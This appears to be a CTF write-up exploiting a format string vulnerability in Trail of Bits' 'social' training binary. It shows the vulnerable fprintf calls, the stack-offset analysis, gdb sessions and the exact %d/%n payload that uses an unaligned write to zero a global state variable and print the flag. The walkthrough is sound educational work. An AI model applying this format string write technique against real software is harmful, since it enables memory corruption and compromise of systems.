Trail of Bits released a number of CTF challeleges on Github.

This post is about the social binary exploitation challenge.

The social challenge is found in the ctf/exploits/binary1_workshop/social_format/ directory. It contains a binary (social), source code (social.c) and a Makefile.

From reading the source code we see that this application includes a state machine to drive a text based menu system. The states essentially involve asking the user for data to fill out an internal data structure and then printing data back. When a special state 0 is reached the flag is printed, however there is no path through the code that will result in a 0 written to the state variable so it looks like the challenge is to find and exploit a memory corruption bug to set this value.

The buffer management all looks safe however the print statements are vulnerable to string format injection.

    void print_details(Person* p,size_t age){
      fprintf(stdout, "name: ");
      fprintf(stdout, p->name);
      puts("");
      fprintf(stdout, "Age: %d\n", age);
      fprintf(stdout, "Description: ");
      fprintf(stdout, p->description);
      puts("");
      fflush(NULL);
      return;
    

The p->name and p->description strings are both taken from the user and incorrectly placed in the format part of the printf statement.

We can prove this by including string format specific characters in our name.

†  ./social
Welcome to mybookspacepage v00.01 Beta!
Name: %s
1.) Change your name
2.) Describe yourself
3.) Display all your information
4.) Exit the system
3
got your choice
Segmentation fault

The %n format specifier will cause printf to write the number of bytes written so far to an arbitrary memory location. The address to write to is read from a pointer on the stack (just like %s). Obviously the thing we want to overwrite is state so we might try using %n to write to the address of this variable.

Getting an address of our choosing onto the stack may seem difficult at first but if we look at the print_details function, the second parameter is the user supplied age which is therefor pushed onto the stack when the function is called. All we need to do is use some other well known format specifiers to pop the right number of preceding values from the stack to get to the age parameter.

We cannot predict the stack layout by reading the source code but we can if we look at the disassembly.

+-----------------------------------------+
| instuction            |   esp  | change |
+-----------------------------------------+
| mov ebp, esp          |     0  |    0   |
| sub esp, 8            |    -8  |   -8   |
| ...                   |        |        |
| push 6                |   -12  |   -4   |
| push 1                |   -16  |   -4   |
| push str.name:        |   -20  |   -4   |
| ...                   |        |        |
| add esp, 0x10         |    -4  |  +16   |
| ...                   |        |        |
| sub esp, 8            |   -12  |   -8   |
| push edx              |   -16  |   -4   |
| push eax              |   -20  |   -4   |
| ...                   |        |        |
| add esp, 0x10         |    -4  |  +16   |
| sub esp, 0xc          |   -16  |  -12   |
| push 0x8048cf2        |   -20  |   -4   |
| ...                   |        |        |
| add esp, 0x10         |    -4  |  +16   |
| ...                   |        |        |
| sub esp, 4            |    -8  |   -4   |
| push dword [arg_ch]   |   -12  |   -4   |
| push str.Age:__d_n    |   -16  |   -4   |
| push eax              |   -20  |   -4   |
| ...                   |        |        |
| add esp, 0x10         |    -4  |  +16   |
| ...                   |        |        |
| push eax              |    -8  |   -4   |
| push 0xd              |   -12  |   -4   |
| push 1                |   -16  |   -4   |
| push str.Description: |   -20  |   -4   |
| ...                   |        |        |
| add esp, 0x10         |    -4  |  +16   |
| sub esp, 8            |   -12  |   -8   |
| push edx              |   -16  |   -4   |
| push eax              |   -20  |   -4   |
| call sym.imp.fprintf  |        |        |
+-----------------------------------------+

So it looks like when we get to the description fprintf call, esp will be ebp - 20. And basic x86 knowledge tells us that the final function argument will be at ebp + 8. So 24 bytes are on the stack between esp and age. The %d format specifier will pop 4 bytes from the stack so we need 7(24/4) %ds to get to the value we want. Let’s try it out.

†  ./social
Welcome to mybookspacepage v00.01 Beta!
...
Description: %d.%d.%d.%d.%d.%d.%d -->%d<--
Age: 666
...
Age: 666
Description: 13.-134513344.0.1.-8232.134515556.134525048 -->666<--

Replacing the final %d in our description with %n will attempt a write to address 666 instead of printing it as a decimal number. So if we enter the address of state as our age, we should be able to change its value.

We can find out the address of state through nm because it is a global variable. Remember that we need to convert it to base10 before entering it as our age.

†  nm social | grep state
0804b050 D state
†  printf %d 0x$(nm social | awk '/state/ {print $1}')
134525008

However, the program state machine will immediately exit upon encountering an “invalid” state so we will need to use a debugger to breakpoint during the mainloop and peek at the value before the program exits.

(gdb) disassemble main_loop
Dump of assembler code for function main_loop:
   ...
   0x08048ab0 <+44>:    mov    %eax,-0x30(%ebp)
   0x08048ab3 <+47>:    mov    0x804b050,%eax
   0x08048ab8 <+52>:    cmp    $0x6,%eax
   0x08048abb <+55>:    ja     0x8048bab <main_loop+295>
   ...

The instruction on address 0x08048ab3 copies the value of state (0x804b050) into eax which corresponds to the start of the switch statement in the main_loop. If we breakpoint here we can print out the value of state and continue.

(gdb) b *0x08048ab3
commands
x/dw 0x0804b050
c
end

r

Breakpoint 1, 0x08048ab3 in main_loop ()
0x804b050 <state>:      2
Description: %d.%d.%d.%d.%d.%d.%d.%n
Age: 134525008
...
Age: 134525008
Description: 13.-134513344.0.1.-8264.134515556.134525048.
...
Breakpoint 1, 0x08048ab3 in main_loop ()
0x804b050 <state>:      44
state 4
no no no no
...
Breakpoint 1, 0x08048ab3 in main_loop ()
0x804b050 <state>:      4
bye bye!
[Inferior 1 (process 4181) exited with code 01]
(gdb)

Excellent, we changed the state to 44. Try adding an extra space to the description and see the value of state change from 44 to 45. We definitely have control of state now. Unfortunately the value we need to set it to is 0. We cannot reduce the number of bytes written to 0 because we need to pop those first 7 values from the stack so this is going to take a little more cunning.

If we read the man page for printf we see this

n      The number of characters written so far is stored into the inte‐
       ger pointed to by the  corresponding  argument.   That  argument
       shall  be  an  int *, or variant whose size matches the (option‐
       ally) supplied integer length modifier.   No  argument  is  con‐
       verted.   (This  specifier  is  not  supported  by  the bionic C
       library.)  The behavior is undefined if the conversion  specifi‐
       cation includes any flags, a field width, or a precision.

If %n expects an int* parameter then it may be safe to assume that it will write an int to our selected memory address. Let’s prove this to ourselves with gdb. We will add a new breakpoint to the print_details function a set every bit of the 4 byte state variable to 1 and then do the string format injection again.

(gdb) b print_details
Breakpoint 2 at 0x80488cf

Breakpoint 2, 0x080488cf in print_details ()
(gdb) set {int}0x804b050 = 0xffffffff
(gdb) x/dw 0x0804b050
0x804b050 <state>:      -1
(gdb) c
Continuing.
...
Age: 134525008
Description: 13.-134513344.0.1.-8264.134515556.134525048.
...
Breakpoint 1, 0x08048ab3 in main_loop ()
0x804b050 <state>:      44
state 4
no no no no

Breakpoint 1, 0x08048ab3 in main_loop ()
0x804b050 <state>:      4
bye bye!
[Inferior 1 (process 19230) exited with code 01]
(gdb)

This proves that %n is not just writing 44 (0x2c) to state but 0x0000002c. The interesting thing about the x86 architecture is that unaligned memory access is perfectly legal. So what if instead of setting our age to 0x0804b050 but instead 0x0804b050 - 1?

Age: 134525007
Description: 13.-134513344.0.1.-8264.134515556.134525048.


Breakpoint 1, 0x08048ab3 in main_loop ()
0x804b050 <state>:      0
Format strings are tricky, forma
Breakpoint 1, 0x08048ab3 in main_loop ()
0x804b050 <state>:      4
bye bye!
[Inferior 1 (process 31542) exited with code 01]
(gdb)

That’s a bingo. Although the flag appears to be truncated due to a bug in the code (it is only reading 32 bytes from the key file). I’m not sure if this is a genuine bug or an extension to the challenge that I missed.

To understand why this works we need to think about Endianess. The x86 architecture is Little Endian, this means that values are stored Least Significant Byte first, in memory. So a 4 byte integer such as state will be stored like this.

| 0x804b050 | 0x804b051 | 0x804b052 | 0x804b053 |
|    0x05   |    0x00   |    0x00   |    0x00   |

You can prove this to yourself in gdb. Observe that printing the value stored at 0x0804b050 as a dword (4 bytes), word (2 bytes) and byte all yield the same value.

(gdb) x/dw 0x0804b050
0x804b050 <state>:      5
(gdb) x/w 0x0804b050
0x804b050 <state>:      5
(gdb) x/b 0x0804b050
0x804b050 <state>:      5

Before and after using %n to write 44 (0x2c) as a 4 byte integer to 0x804b04f can be visualised like this.

| 0x804b04f | 0x804b050 | 0x804b051 | 0x804b052 | 0x804b053 |
|    0x??   |    0x05   |    0x00   |    0x00   |    0x00   |

| 0x804b04f | 0x804b050 | 0x804b051 | 0x804b052 | 0x804b053 |
|    0x2c   |    0x00   |    0x00   |    0x00   |    0x00   |